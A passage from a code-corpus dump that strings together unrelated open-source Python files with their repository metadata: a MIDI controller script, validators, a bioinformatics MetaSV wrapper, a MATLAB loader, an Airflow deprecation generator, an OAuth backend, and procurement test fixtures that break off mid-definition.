        q_labels = ["None", "1/4", "1/8", "1/8T", "1/8 + 1/8T",
                    "1/16", "1/16T", "1/16 + 1/16T", "1/32"]
        self.song.midi_recording_quantization = self._get_quantization(value, mode, status)
        self.show_message(
            "MIDI recording quantization: %s" %
            q_labels[self.song.midi_recording_quantization]
        )

    def _get_quantization(self, value, mode, status):
        # 0: None
        # 1: 1/4
        # 2: 1/8
        # 3: 1/8T
        # 4: 1/8 + 1/8T
        # 5: 1/16
        # 6: 1/16T
        # 7: 1/16 + 1/16T
        # 8: 1/32
        # Use an explicit +/-1 step; value / abs(value) yields a float
        # under Python 3 and would make the returned index a float.
        step = 1 if value > 0 else -1
        next_index = range(9).index(self.song.midi_recording_quantization) + step
        return min(max(0, next_index), 8)

    @ignore_cc_zero
    def fire_next_scene(self, value, mode, status):
        scene = self.get_scene_by_delta(1)
        scene.fire()
        self.song.view.selected_scene = scene

    def on_track_selected(self):
        """Mirror the selected track's arm/mute/solo state to the controller."""
        # (note on: 144 | note off: 128, note, velocity)
        def _build_midi_msg(status):
            if status:
                msg = 144
                vel = 1
            else:
                msg = 128
                vel = 0
            return msg, vel

        track = self.song.view.selected_track
        # TODO: check if send or master track
        msg, vel = _build_midi_msg(track.arm)
        self.c_instance.send_midi((msg, mappings["arm"].key, vel))
        msg, vel = _build_midi_msg(track.mute)
        self.c_instance.send_midi((msg, mappings["mute"].key, vel))
        msg, vel = _build_midi_msg(track.solo)
        self.c_instance.send_midi((msg, mappings["solo"].key, vel))
        if len(track.devices) > 0:
            self.song.view.select_device(track.devices[0])
| {
"content_hash": "0d4f9355c3a6a73141277f4539419f45",
"timestamp": "",
"source": "github",
"line_count": 273,
"max_line_length": 106,
"avg_line_length": 38.282051282051285,
"alnum_prop": 0.5841546263515454,
"repo_name": "nandordevai/MPD218_TotalControl",
"id": "a7fd78103e9664c6eb3a9c0d9c744f627a4501d4",
"size": "10451",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "GlobalControl.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "16261"
}
],
"symlink_target": ""
} |
"""
Decorators which can be used for validating arguments passed into decorated functions
"""
from functools import wraps
from inspect import signature
def non_empty(*parameter_names):
    """
    Enforces arguments to parameters passed in have len > 0.

    The named parameters are validated against the decorated function's
    signature at decoration time, so a misspelled name fails fast with a
    TypeError instead of a KeyError at call time.
    """
    def _decorator(f):
        sig = signature(f)
        # Fail early on parameter names that do not exist in the signature.
        unknown = [name for name in parameter_names if name not in sig.parameters]
        if unknown:
            raise TypeError(
                "Parameters {} not found in signature of {}".format(
                    unknown, f.__name__
                )
            )

        @wraps(f)
        def _inner(*args, **kwargs):
            bindings = sig.bind(*args, **kwargs)
            # Fill in default values so omitted parameters are validated
            # too (bind() alone leaves them out of .arguments).
            bindings.apply_defaults()
            for parameter_name in parameter_names:
                if not len(bindings.arguments[parameter_name]):
                    raise TypeError(
                        "Expected non-empty argument for parameter {}".format(
                            parameter_name
                        )
                    )
            return f(*args, **kwargs)
        return _inner
    return _decorator
| {
"content_hash": "272e16b648c2f80dcd01936712aee936",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 85,
"avg_line_length": 28.870967741935484,
"alnum_prop": 0.5586592178770949,
"repo_name": "econ-ark/HARK",
"id": "792832abc180b3dc364c6e2d82b55e67d6a647b5",
"size": "895",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "HARK/validators.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "111"
},
{
"name": "Python",
"bytes": "1397750"
},
{
"name": "Shell",
"bytes": "350"
}
],
"symlink_target": ""
} |
"""Perform ensemble calling of structural variants using MetaSV.
https://github.com/chapmanb/metasv
http://dx.doi.org/10.1093/bioinformatics/btv204
"""
import os
import sys
from bcbio import utils
from bcbio.provenance import do
from bcbio.pipeline import datadict as dd
from bcbio.structural import shared
from bcbio.variation import effects, vfilter
MIN_CALLERS = 2
SUPPORTED = set(["manta", "lumpy", "cnvkit", "wham"])
def run(items):
    """Run MetaSV if we have enough supported callers, adding output to the set of calls.

    Takes a single-sample input list, collects the per-caller structural
    variant VCFs already present in data["sv"], and -- when at least
    MIN_CALLERS supported callers contributed -- runs MetaSV, filters the
    combined calls and appends the result as a new "metasv" entry.
    """
    assert len(items) == 1, "Expect one input to MetaSV ensemble calling"
    data = items[0]
    work_dir = _sv_workdir(data)
    out_file = os.path.join(work_dir, "variants.vcf.gz")
    # Base invocation: sample identity, reference and alignments.
    cmd = _get_cmd() + ["--sample", dd.get_sample_name(data), "--reference", dd.get_ref_file(data),
                        "--bam", dd.get_align_bam(data), "--outdir", work_dir]
    # Add one input VCF per supported caller, skipping duplicate callers.
    methods = []
    for call in data.get("sv", []):
        if call["variantcaller"] in SUPPORTED and call["variantcaller"] not in methods:
            methods.append(call["variantcaller"])
            cmd += ["--%s_vcf" % call["variantcaller"], call.get("vcf_file", call["vrn_file"])]
    # Only ensemble when enough independent callers provided evidence.
    if len(methods) >= MIN_CALLERS:
        if not utils.file_exists(out_file):
            tx_work_dir = utils.safe_makedir(os.path.join(work_dir, "raw"))
            # Paired-end insert size statistics, passed to MetaSV via
            # --isize_mean/--isize_sd below.
            ins_stats = shared.calc_paired_insert_stats_save(dd.get_align_bam(data),
                                                             os.path.join(tx_work_dir, "insert-stats.yaml"))
            cmd += ["--workdir", tx_work_dir, "--num_threads", str(dd.get_num_cores(data))]
            cmd += ["--spades", utils.which("spades.py"), "--age", utils.which("age_align")]
            cmd += ["--assembly_max_tools=1", "--assembly_pad=500"]
            cmd += ["--boost_sc", "--isize_mean", ins_stats["mean"], "--isize_sd", ins_stats["std"]]
            do.run(cmd, "Combine variant calls with MetaSV")
        # Hard-filter low-confidence ensemble calls based on tool support,
        # size and local assembly statistics.
        filters = ("(NUM_SVTOOLS = 1 && ABS(SVLEN)>50000) || "
                   "(NUM_SVTOOLS = 1 && ABS(SVLEN)<4000 && BA_FLANK_PERCENT>80) || "
                   "(NUM_SVTOOLS = 1 && ABS(SVLEN)<4000 && BA_NUM_GOOD_REC=0) || "
                   "(ABS(SVLEN)<4000 && BA_NUM_GOOD_REC>2)")
        filter_file = vfilter.hard_w_expression(out_file, filters,
                                                data, name="ReassemblyStats", limit_regions=None)
        effects_vcf, _ = effects.add_to_vcf(filter_file, data, "snpeff")
        data["sv"].append({"variantcaller": "metasv",
                           "vrn_file": effects_vcf or filter_file})
    return [data]
def _sv_workdir(data):
    """Return (creating it if needed) the per-sample MetaSV working directory."""
    out_dir = os.path.join(data["dirs"]["work"], "structural",
                           dd.get_sample_name(data), "metasv")
    return utils.safe_makedir(out_dir)
def _get_cmd():
return [sys.executable, os.path.join(os.path.dirname(sys.executable), "run_metasv.py")]
| {
"content_hash": "506fdc20cd3b6c6275d706b5de842dea",
"timestamp": "",
"source": "github",
"line_count": 58,
"max_line_length": 108,
"avg_line_length": 50.293103448275865,
"alnum_prop": 0.5779910867329449,
"repo_name": "lpantano/bcbio-nextgen",
"id": "95ce143db71ab609a825a6ee5f8a1a0c94e04dda",
"size": "2917",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "bcbio/structural/metasv.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1553199"
},
{
"name": "Ruby",
"bytes": "624"
},
{
"name": "Shell",
"bytes": "14377"
}
],
"symlink_target": ""
} |
import string
import os
import numpy
from scipy import io as spio
# This code is from:
# http://stackoverflow.com/questions/7008608/
# scipy-io-loadmat-nested-structures-i-e-dictionaries
def loadmat(filename):
    """Load a MATLAB .mat file, returning nested Python dictionaries.

    This function should be called instead of direct spio.loadmat as it
    cures the problem of not properly recovering python dictionaries from
    mat files: loadmat is invoked with struct_as_record=False and
    squeeze_me=True, then any mat_struct objects in the result are
    recursively converted into plain dicts.
    """
    data = spio.loadmat(filename, struct_as_record=False, squeeze_me=True)
    return _check_keys(data)


# scipy.io.matlab.mat_struct is the public name since SciPy 1.8; fall back to
# the older private location so this keeps working on earlier SciPy releases.
try:
    _MatStruct = spio.matlab.mat_struct
except AttributeError:
    _MatStruct = spio.matlab.mio5_params.mat_struct


def _check_keys(d):
    """Replace any mat_struct values in dict *d* with nested dictionaries.

    Mutates and returns *d*.
    """
    for key in d:
        if isinstance(d[key], _MatStruct):
            d[key] = _todict(d[key])
    return d


def _todict(matobj):
    """Recursively convert a mat_struct object into a nested dictionary.

    ndarray fields are converted to (nested) lists; other values are kept
    as-is.
    """
    # NOTE: renamed from `dict` in the original to avoid shadowing the builtin.
    result = {}
    for field in matobj._fieldnames:
        elem = matobj.__dict__[field]
        if isinstance(elem, _MatStruct):
            result[field] = _todict(elem)
        elif isinstance(elem, numpy.ndarray):
            result[field] = elem.tolist()
        else:
            result[field] = elem
    return result
if __name__ == "__main__":
    # Load the M600 aero database and expose the wing sample under the key
    # the template's format placeholders expect.
    mat = loadmat(os.environ['MAKANI_HOME']
                  + '/database/m600/M600_20130810.mat')
    mat['mat'] = mat['sampleWing']
    with open(os.environ['MAKANI_HOME'] + '/lib/datatools/sys_params.txt', 'r') as template_file:
        sys_params_template = template_file.read()
    # Render the template with the .mat contents and write the generated module.
    with open(os.environ['MAKANI_HOME'] + '/base/m600_sys_params.py', 'w') as out_file:
        out_file.write(sys_params_template.format(**mat))
| {
"content_hash": "5a0e4f331af07c2b670bf42cfff5c3bf",
"timestamp": "",
"source": "github",
"line_count": 54,
"max_line_length": 78,
"avg_line_length": 32.01851851851852,
"alnum_prop": 0.6460381723539619,
"repo_name": "google/makani",
"id": "b4c89df5a822cd4239ca09aa0d45a55362e205bf",
"size": "2337",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "lib/datatools/mat2csim.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "119408"
},
{
"name": "C",
"bytes": "20174258"
},
{
"name": "C++",
"bytes": "30512322"
},
{
"name": "CSS",
"bytes": "8921"
},
{
"name": "Dockerfile",
"bytes": "1381"
},
{
"name": "Emacs Lisp",
"bytes": "1134"
},
{
"name": "HTML",
"bytes": "65745"
},
{
"name": "Java",
"bytes": "1558475"
},
{
"name": "JavaScript",
"bytes": "130727"
},
{
"name": "Jupyter Notebook",
"bytes": "1154728"
},
{
"name": "MATLAB",
"bytes": "1026162"
},
{
"name": "Makefile",
"bytes": "2798"
},
{
"name": "Objective-C",
"bytes": "62972"
},
{
"name": "Perl",
"bytes": "870724"
},
{
"name": "Python",
"bytes": "5552781"
},
{
"name": "RPC",
"bytes": "195736"
},
{
"name": "Roff",
"bytes": "2567875"
},
{
"name": "SWIG",
"bytes": "8663"
},
{
"name": "Shell",
"bytes": "297941"
},
{
"name": "Starlark",
"bytes": "462998"
},
{
"name": "Vim Script",
"bytes": "2281"
},
{
"name": "XC",
"bytes": "50398"
},
{
"name": "XS",
"bytes": "49289"
}
],
"symlink_target": ""
} |
from JumpScale.clients.racktivity.energyswitch.modelfactory.models.common.Power_0_0_5_29 import Model as ModelClass
class Model(ModelClass):
pass
| {
"content_hash": "90acd304af908f55b0253054a5120e28",
"timestamp": "",
"source": "github",
"line_count": 5,
"max_line_length": 115,
"avg_line_length": 30.4,
"alnum_prop": 0.8092105263157895,
"repo_name": "Jumpscale/jumpscale_core8",
"id": "2e062511f1e3233b2b6a3da354bec4f4038a76e0",
"size": "152",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "lib/JumpScale/clients/racktivity/energyswitch/modelfactory/models/RTF0029/Power_0_0_5_29.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1113"
},
{
"name": "Cap'n Proto",
"bytes": "9033"
},
{
"name": "Lua",
"bytes": "12538"
},
{
"name": "Python",
"bytes": "4343122"
},
{
"name": "Shell",
"bytes": "7091"
}
],
"symlink_target": ""
} |
from io import BytesIO
import PIL
from PIL import ImageFont
from PIL import Image
from PIL import ImageDraw
def text_to_png(text, color = "#000", bgcolor = "#FFF", fontfullpath = None, fontsize = 13, leftpadding = 3, rightpadding = 3, width = 500):
    """Render *text* as a word-wrapped RGBA image and return raw PNG bytes.

    Newlines in *text* are honored; other line breaks are inserted so that no
    line exceeds ``width - leftpadding - rightpadding`` pixels.

    :param text: text to render (may contain '\\n')
    :param color: foreground (text) color
    :param bgcolor: background color
    :param fontfullpath: path to a TrueType font; default bitmap font if None
    :param fontsize: point size, used only when fontfullpath is given
    :param leftpadding: left margin in pixels
    :param rightpadding: right margin in pixels
    :param width: total image width in pixels
    :returns: PNG-encoded image as bytes
    """
    REPLACEMENT_CHARACTER = 'nlnlnl'
    NEWLINE_REPLACEMENT_STRING = ' ' + REPLACEMENT_CHARACTER + ' '

    def _size(fnt, s):
        # Pillow >= 10 removed ImageFont.getsize; fall back to getbbox there.
        try:
            return fnt.getsize(s)
        except AttributeError:
            left, top, right, bottom = fnt.getbbox(s)
            return right - left, bottom - top

    # was `fontfullpath == None`; identity comparison is the correct idiom
    font = ImageFont.load_default() if fontfullpath is None else ImageFont.truetype(fontfullpath, fontsize)
    text = text.replace('\n', NEWLINE_REPLACEMENT_STRING)

    lines = []
    line = ""

    for word in text.split():
        if word == REPLACEMENT_CHARACTER:  # give a blank line
            lines.append(line[1:])  # slice the white space in the begining of the line
            line = ""
            lines.append("")  # the blank line
        elif _size(font, line + ' ' + word)[0] <= (width - rightpadding - leftpadding):
            line += ' ' + word
        else:  # start a new line
            lines.append(line[1:])  # slice the white space in the begining of the line
            line = ""
            # TODO: handle too long words at this point
            line += ' ' + word  # for now, assume no word alone can exceed the line width

    if len(line) != 0:
        lines.append(line[1:])  # add the last line

    line_height = _size(font, text)[1]
    img_height = line_height * (len(lines) + 1)

    img = Image.new("RGBA", (width, img_height), bgcolor)
    draw = ImageDraw.Draw(img)

    y = 0
    for line in lines:
        draw.text((leftpadding, y), line, color, font=font)
        y += line_height

    byte_io = BytesIO()
    img.save(byte_io, 'PNG')
    return byte_io.getvalue()
# #show time
# text2png(u"This is\na\ntest şğıöç zaa xd ve lorem hipster", 'test.png', fontfullpath = "font.ttf") | {
"content_hash": "f63fd327098c7f57c9f7026f2a937611",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 140,
"avg_line_length": 30.88679245283019,
"alnum_prop": 0.6707391569945022,
"repo_name": "fake-name/ReadableWebProxy",
"id": "46d2d755b3b9f9fe6899241d6abf9092c8a75b10",
"size": "1721",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Misc/txt_to_img.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "105811"
},
{
"name": "Dockerfile",
"bytes": "1178"
},
{
"name": "HTML",
"bytes": "119737"
},
{
"name": "JavaScript",
"bytes": "3006524"
},
{
"name": "Jupyter Notebook",
"bytes": "148075"
},
{
"name": "Mako",
"bytes": "1454"
},
{
"name": "Python",
"bytes": "5264346"
},
{
"name": "Shell",
"bytes": "1059"
}
],
"symlink_target": ""
} |
from __future__ import annotations
import ast
import os
from collections import defaultdict
from functools import lru_cache
from pathlib import Path
from typing import NamedTuple
from jinja2 import BaseLoader, Environment
from rich.console import Console
if __name__ not in ("__main__", "__mp_main__"):
    # Guard against accidental import: this script only makes sense when run directly.
    raise SystemExit(
        "This file is intended to be executed as an executable program. You cannot use it as a module. "
        f"To run this script, run the ./{__file__} command [FILE] ..."
    )
# Repository root (two directory levels above this script) and the legacy
# contrib tree that is scanned for deprecated imports.
AIRFLOW_SOURCES_ROOT = Path(__file__).parents[2].resolve()
CONTRIB_DIR = AIRFLOW_SOURCES_ROOT / "airflow" / "contrib"
@lru_cache(maxsize=None)
def black_mode():
    """Build (once, via lru_cache) a black.Mode from the repo's pyproject.toml.

    Reads the [tool.black] settings from AIRFLOW_SOURCES_ROOT/pyproject.toml,
    falling back to black's own defaults for any key not present.
    """
    # Imported lazily so merely importing this module does not require black.
    from black import Mode, parse_pyproject_toml, target_version_option_callback
    config = parse_pyproject_toml(os.path.join(AIRFLOW_SOURCES_ROOT, "pyproject.toml"))
    target_versions = set(
        target_version_option_callback(None, None, tuple(config.get('target_version', ()))),
    )
    return Mode(
        target_versions=target_versions,
        line_length=config.get('line_length', Mode.line_length),
        is_pyi=bool(config.get('is_pyi', Mode.is_pyi)),
        string_normalization=not bool(config.get('skip_string_normalization', not Mode.string_normalization)),
        experimental_string_processing=bool(
            config.get('experimental_string_processing', Mode.experimental_string_processing)
        ),
    )
def black_format(content) -> str:
    """Return *content* (Python source text) reformatted with the project's Black settings."""
    from black import format_str
    return format_str(content, mode=black_mode())
class Import(NamedTuple):
    """One deprecated re-export: *alias* resolves to *module_path*.*name*."""
    module_path: str  # dotted module the name comes from ("" for plain `import x`)
    name: str  # original name within module_path
    alias: str  # name it is exposed under (asname, or the subclass's name)
class ImportedClass(NamedTuple):
    """Where an imported name originally lives: *module_path*.*name*."""
    module_path: str  # dotted source module ("" for plain `import x`)
    name: str  # name within that module
def get_imports(path: Path):
    """Yield an Import entry for every name imported at top level of *path*.

    Handles three top-level node kinds: plain imports (recorded with an
    empty module path), from-imports, and class definitions — a class whose
    base was previously imported re-exports that base under the class's
    own name.
    """
    root = ast.parse(path.read_text())
    # Maps a locally bound name to where it was imported from, so ClassDef
    # bases can be resolved back to their source module.
    imports: dict[str, ImportedClass] = {}
    for node in ast.iter_child_nodes(root):
        if isinstance(node, ast.Import):
            module_array: list[str] = []  # plain "import x" has no source module path
        elif isinstance(node, ast.ImportFrom) and node.module:
            module_array = node.module.split('.')
        elif isinstance(node, ast.ClassDef):
            # Subclassing an imported name re-exports it under the class name.
            for base in node.bases:
                res = imports.get(base.id)  # type: ignore[attr-defined]
                if res:
                    yield Import(module_path=res.module_path, name=res.name, alias=node.name)
            continue  # ClassDef has no .names; skip the loop below
        else:
            continue
        for n in node.names:  # type: ignore[attr-defined]
            imported_as = n.asname if n.asname else n.name
            module_path = ".".join(module_array)
            imports[imported_as] = ImportedClass(module_path=module_path, name=n.name)
            yield Import(module_path, n.name, imported_as)
DEPRECATED_CLASSES_TEMPLATE = """
__deprecated_classes = {
{%- for module_path, package_imports in package_imports.items() %}
'{{module_path}}': {
{%- for import_item in package_imports %}
'{{import_item.alias}}': '{{import_item.module_path}}.{{import_item.name}}',
{%- endfor %}
},
{%- endfor %}
}
"""
DEPRECATED_MODULES = [
'airflow/hooks/base_hook.py',
'airflow/hooks/dbapi_hook.py',
'airflow/hooks/docker_hook.py',
'airflow/hooks/druid_hook.py',
'airflow/hooks/hdfs_hook.py',
'airflow/hooks/hive_hooks.py',
'airflow/hooks/http_hook.py',
'airflow/hooks/jdbc_hook.py',
'airflow/hooks/mssql_hook.py',
'airflow/hooks/mysql_hook.py',
'airflow/hooks/oracle_hook.py',
'airflow/hooks/pig_hook.py',
'airflow/hooks/postgres_hook.py',
'airflow/hooks/presto_hook.py',
'airflow/hooks/S3_hook.py',
'airflow/hooks/samba_hook.py',
'airflow/hooks/slack_hook.py',
'airflow/hooks/sqlite_hook.py',
'airflow/hooks/webhdfs_hook.py',
'airflow/hooks/zendesk_hook.py',
'airflow/operators/bash_operator.py',
'airflow/operators/branch_operator.py',
'airflow/operators/check_operator.py',
'airflow/operators/dagrun_operator.py',
'airflow/operators/docker_operator.py',
'airflow/operators/druid_check_operator.py',
'airflow/operators/dummy.py',
'airflow/operators/dummy_operator.py',
'airflow/operators/email_operator.py',
'airflow/operators/gcs_to_s3.py',
'airflow/operators/google_api_to_s3_transfer.py',
'airflow/operators/hive_operator.py',
'airflow/operators/hive_stats_operator.py',
'airflow/operators/hive_to_druid.py',
'airflow/operators/hive_to_mysql.py',
'airflow/operators/hive_to_samba_operator.py',
'airflow/operators/http_operator.py',
'airflow/operators/jdbc_operator.py',
'airflow/operators/latest_only_operator.py',
'airflow/operators/mssql_operator.py',
'airflow/operators/mssql_to_hive.py',
'airflow/operators/mysql_operator.py',
'airflow/operators/mysql_to_hive.py',
'airflow/operators/oracle_operator.py',
'airflow/operators/papermill_operator.py',
'airflow/operators/pig_operator.py',
'airflow/operators/postgres_operator.py',
'airflow/operators/presto_check_operator.py',
'airflow/operators/presto_to_mysql.py',
'airflow/operators/python_operator.py',
'airflow/operators/redshift_to_s3_operator.py',
'airflow/operators/s3_file_transform_operator.py',
'airflow/operators/s3_to_hive_operator.py',
'airflow/operators/s3_to_redshift_operator.py',
'airflow/operators/slack_operator.py',
'airflow/operators/sql.py',
'airflow/operators/sql_branch_operator.py',
'airflow/operators/sqlite_operator.py',
'airflow/operators/subdag_operator.py',
'airflow/sensors/base_sensor_operator.py',
'airflow/sensors/date_time_sensor.py',
'airflow/sensors/external_task_sensor.py',
'airflow/sensors/hdfs_sensor.py',
'airflow/sensors/hive_partition_sensor.py',
'airflow/sensors/http_sensor.py',
'airflow/sensors/metastore_partition_sensor.py',
'airflow/sensors/named_hive_partition_sensor.py',
'airflow/sensors/s3_key_sensor.py',
'airflow/sensors/sql.py',
'airflow/sensors/sql_sensor.py',
'airflow/sensors/time_delta_sensor.py',
'airflow/sensors/web_hdfs_sensor.py',
'airflow/utils/log/cloudwatch_task_handler.py',
'airflow/utils/log/es_task_handler.py',
'airflow/utils/log/gcs_task_handler.py',
'airflow/utils/log/s3_task_handler.py',
'airflow/utils/log/stackdriver_task_handler.py',
'airflow/utils/log/wasb_task_handler.py',
]
CONTRIB_FILES = (AIRFLOW_SOURCES_ROOT / "airflow" / "contrib").rglob("*.py")
if __name__ == '__main__':
    console = Console(color_system="standard", width=300)
    # package -> submodule name -> deprecated imports found in that submodule
    all_deprecated_imports: dict[str, dict[str, list[Import]]] = defaultdict(lambda: defaultdict(list))
    # Flip to True to also delete the scanned contrib files after collecting
    # their imports (destructive; left off by default).
    # delete = True
    delete = False
    # for file in DEPRECATED_MODULES:
    for file in CONTRIB_FILES:
        file_path = AIRFLOW_SOURCES_ROOT / file
        if not file_path.exists() or file.name == "__init__.py":
            continue
        # Dotted package path of the file's directory, relative to the repo root.
        original_module = os.fspath(file_path.parent.relative_to(AIRFLOW_SOURCES_ROOT)).replace(os.sep, ".")
        for _import in get_imports(file_path):
            module_name = file_path.name[: -len(".py")]
            # warnings/RemovedInAirflow3Warning are deprecation machinery, not re-exports.
            if _import.name not in ['warnings', 'RemovedInAirflow3Warning']:
                all_deprecated_imports[original_module][module_name].append(_import)
        if delete:
            file_path.unlink()
    # Render one black-formatted __deprecated_classes dict per package.
    for module_path, package_imports in all_deprecated_imports.items():
        console.print(f"[yellow]Import dictionary for {module_path}:\n")
        template = Environment(loader=BaseLoader()).from_string(DEPRECATED_CLASSES_TEMPLATE)
        print(black_format(template.render(package_imports=dict(sorted(package_imports.items())))))
| {
"content_hash": "e146f65435dbb908bc34bab13170e2cb",
"timestamp": "",
"source": "github",
"line_count": 201,
"max_line_length": 110,
"avg_line_length": 37.766169154228855,
"alnum_prop": 0.6693452773020683,
"repo_name": "cfei18/incubator-airflow",
"id": "8fbe8290a3882ccf953d2297e2b50c1daf1ceb6a",
"size": "8376",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dev/deprecations/generate_deprecated_dicts.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "25980"
},
{
"name": "Dockerfile",
"bytes": "72003"
},
{
"name": "HCL",
"bytes": "3786"
},
{
"name": "HTML",
"bytes": "173434"
},
{
"name": "JavaScript",
"bytes": "143068"
},
{
"name": "Jinja",
"bytes": "38808"
},
{
"name": "Jupyter Notebook",
"bytes": "5482"
},
{
"name": "Mako",
"bytes": "1339"
},
{
"name": "Python",
"bytes": "22660683"
},
{
"name": "R",
"bytes": "313"
},
{
"name": "Shell",
"bytes": "312715"
},
{
"name": "TypeScript",
"bytes": "472379"
}
],
"symlink_target": ""
} |
"""
DailyMotion OAuth2 backend, docs at:
https://python-social-auth.readthedocs.io/en/latest/backends/dailymotion.html
"""
from .oauth import BaseOAuth2
class DailymotionOAuth2(BaseOAuth2):
    """Dailymotion OAuth2 authentication backend.

    Uses Dailymotion's OAuth endpoints and identifies users by their
    Dailymotion username.
    """
    name = 'dailymotion'
    ID_KEY = 'username'
    EXTRA_DATA = [('id', 'id')]
    AUTHORIZATION_URL = 'https://api.dailymotion.com/oauth/authorize'
    REQUEST_TOKEN_URL = 'https://api.dailymotion.com/oauth/token'
    ACCESS_TOKEN_URL = 'https://api.dailymotion.com/oauth/token'
    ACCESS_TOKEN_METHOD = 'POST'

    def get_user_details(self, response):
        """Map the provider profile onto social-auth user detail fields."""
        screenname = response.get('screenname')
        return {'username': screenname}

    def user_data(self, access_token, *args, **kwargs):
        """Return user data provided"""
        params = {'access_token': access_token}
        return self.get_json('https://api.dailymotion.com/auth/', params=params)
| {
"content_hash": "5e54b8467dbbee69703c3ed6e7abf2d0",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 81,
"avg_line_length": 37.166666666666664,
"alnum_prop": 0.6603139013452914,
"repo_name": "tobias47n9e/social-core",
"id": "8f908bef3bc5d2c2a558d2ad07e7b2b26a099a85",
"size": "892",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "social_core/backends/dailymotion.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "1462"
},
{
"name": "Python",
"bytes": "631379"
}
],
"symlink_target": ""
} |
import json
import os
import unittest
from datetime import timedelta
import openprocurement.tender.twostage.tests.base as base_test
from openprocurement.api.models import get_now
from openprocurement.api.tests.base import PrefixedRequestClass
from openprocurement.tender.twostage.tests.tender import BaseTenderWebTest
from webtest import TestApp
# Fixture: two-stage tender (school catering) with bilingual fields and two
# identical items; used by the docs-generating test below.
test_tender_data = {
    "tenderPeriod": {
        "endDate": "2016-02-11T14:04:18.962451"
    },
    "title": "Послуги шкільних їдалень",
    "title_en": "Services in school canteens",
    "minimalStep": {
        "currency": "UAH",
        "amount": 35
    },
    "procurementMethodType": "aboveThresholdTS",
    "value": {
        "currency": "UAH",
        "amount": 500
    },
    "procuringEntity": {
        "kind": "general",
        "address": {
            "countryName": "Україна",
            "locality": "м. Вінниця",
            "postalCode": "21027",
            "region": "м. Вінниця",
            "streetAddress": "вул. Стахурського. 22"
        },
        "contactPoint": {
            "name": "Куца Світлана Валентинівна",
            "name_en": "Kutsa Svitlana V.",
            "telephone": "+380 (432) 46-53-02",
            "availableLanguage": u"uk",
            "url": "http://sch10.edu.vn.ua/"
        },
        "identifier": {
            "id": "21725150",
            "legalName": "Заклад \"Загальноосвітня школа І-ІІІ ступенів № 10 Вінницької міської ради\"",
            "legalName_en": "The institution \"Secondary school I-III levels № 10 Vinnitsa City Council\"",
            "scheme": "UA-EDR"
        },
        "name": "ЗОСШ #10 м.Вінниці",
        "name_en": "School #10 of Vinnytsia"
    },
    "items": [
        {
            "unit": {
                "code": "44617100-9",
                "name": "item"
            },
            "additionalClassifications": [
                {
                    "scheme": "ДКПП",
                    "id": "17.21.1",
                    "description": "Послуги шкільних їдалень"
                }
            ],
            "description": "Послуги шкільних їдалень",
            "description_en": "Services in school canteens",
            "classification": {
                "scheme": "CPV",
                "id": "37810000-9",
                "description": "Test"
            },
            "deliveryDate": {
                "startDate": (get_now() + timedelta(days=20)).isoformat(),
                "endDate": (get_now() + timedelta(days=50)).isoformat()
            },
            "deliveryAddress": {
                "countryName": u"Україна",
                "postalCode": "79000",
                "region": u"м. Київ",
                "locality": u"м. Київ",
                "streetAddress": u"вул. Банкова 1"
            },
            "quantity": 1
        }, {
            "unit": {
                "code": "44617100-9",
                "name": "item"
            },
            "additionalClassifications": [
                {
                    "scheme": "ДКПП",
                    "id": "17.21.1",
                    "description": "Послуги шкільних їдалень"
                }
            ],
            "description": "Послуги шкільних їдалень",
            "description_en": "Services in school canteens",
            "classification": {
                "scheme": "CPV",
                "id": "37810000-9",
                "description": "Test"
            },
            "quantity": 1,
            "deliveryDate": {
                "startDate": (get_now() + timedelta(days=20)).isoformat(),
                "endDate": (get_now() + timedelta(days=50)).isoformat()
            },
            "deliveryAddress": {
                "countryName": u"Україна",
                "postalCode": "79000",
                "region": u"м. Київ",
                "locality": u"м. Київ",
                "streetAddress": u"вул. Банкова 1"
            }
        }
    ]
}
# Replace the hard-coded (stale) tenderPeriod above with a rolling 31-day
# window so the fixture always starts in the active tendering stage.
test_tender_data["tenderPeriod"] = {
    "endDate": (get_now() + timedelta(days=31)).isoformat()
}
# First bid: full tender value, created in "draft" status so the tutorial can
# show explicit activation.
bid = {
    "data": {
        "tenderers": [
            {
                "address": {
                    "countryName": "Україна",
                    "locality": "м. Вінниця",
                    "postalCode": "21100",
                    "region": "м. Вінниця",
                    "streetAddress": "вул. Островського, 33"
                },
                "contactPoint": {
                    "email": "soleksuk@gmail.com",
                    "name": "Сергій Олексюк",
                    "telephone": "+380 (432) 21-69-30"
                },
                "identifier": {
                    "scheme": u"UA-EDR",
                    "id": u"00137256",
                    "uri": u"http://www.sc.gov.ua/"
                },
                "name": "ДКП «Школяр»"
            }
        ],
        "value": {
            "amount": 500
        },
        "status": "draft",
    }
}
# Second bid: slightly lower value, no draft status.
bid2 = {
    "data": {
        "tenderers": [
            {
                "address": {
                    "countryName": "Україна",
                    "locality": "м. Львів",
                    "postalCode": "79013",
                    "region": "м. Львів",
                    "streetAddress": "вул. Островського, 34"
                },
                "contactPoint": {
                    "email": "aagt@gmail.com",
                    "name": "Андрій Олексюк",
                    "telephone": "+380 (322) 91-69-30"
                },
                "identifier": {
                    "scheme": u"UA-EDR",
                    "id": u"00137226",
                    "uri": u"http://www.sc.gov.ua/"
                },
                "name": "ДКП «Книга»"
            }
        ],
        "value": {
            "amount": 499
        },
    }
}
# Third bid: deliberately very low value.
bid3 = {
